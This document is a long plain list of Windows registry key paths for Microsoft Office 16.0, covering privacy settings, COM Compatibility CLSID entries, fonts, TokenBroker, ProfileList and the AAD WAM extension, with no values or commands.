HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Cloud\Office\16.0\common\officesvcmanager
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RequiredDiagnosticDataNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalDiagnosticDataConsentVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RoamingNotificationState
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\UseAlternateOutlookAppUserModelId
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Fonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\TestHooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TokenBroker\TestHooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\DisableExtensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2527171340-3306644326-1278290521-1001
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2527171340-3306644326-1278290521-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\TrustLevel
